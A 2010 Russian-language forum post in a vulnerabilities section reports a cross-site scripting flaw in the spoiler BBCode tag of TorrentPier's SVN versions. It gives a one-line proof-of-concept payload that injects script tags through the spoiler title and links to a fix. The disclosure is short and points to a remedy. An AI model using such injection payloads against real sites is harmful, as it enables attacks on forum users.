Форумы HOT: TorrentPier svn (all rev.) XSS

Discussion in 'Уязвимости CMS/форумов' started by lEx0, 22 Jul 2010.

  1. lEx0

    lEx0 New Member

    Joined:
    21 Jul 2010
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    так нашли XSS в торрентпире, связанный с спойлером который заменили в svn версии трекера. (спс за это PandoraBox)

    XSS:
    Code:
        [spoiler="<script>alert('Pwned!')</script><script>alert('Pwned!')</script>"]1111[/spoiler]
    Решение:
    http://forum.yaonline.kz/fludilnya/xss-torrentpier-vzlom-trekera-t263.html

    многие прикрыли дырку по моему рецепту, но многие еще не знают об этой дырке!

    Новость свежая жду к репе :D
     
    1 person likes this.